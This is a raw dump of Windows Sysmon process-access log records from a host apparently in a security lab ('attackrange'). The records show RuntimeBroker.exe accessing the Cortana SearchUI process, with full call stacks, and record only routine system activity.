13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012454Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012453Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12f31|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12de3|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12cd7|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:35.914{59A5CD1D-93F9-6005-F104-00000000A301}45405712C:\Windows\System32\RuntimeBroker.exe{59A5CD1D-9409-6005-0B05-00000000A301}5428C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12ba9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1151a|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000012436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
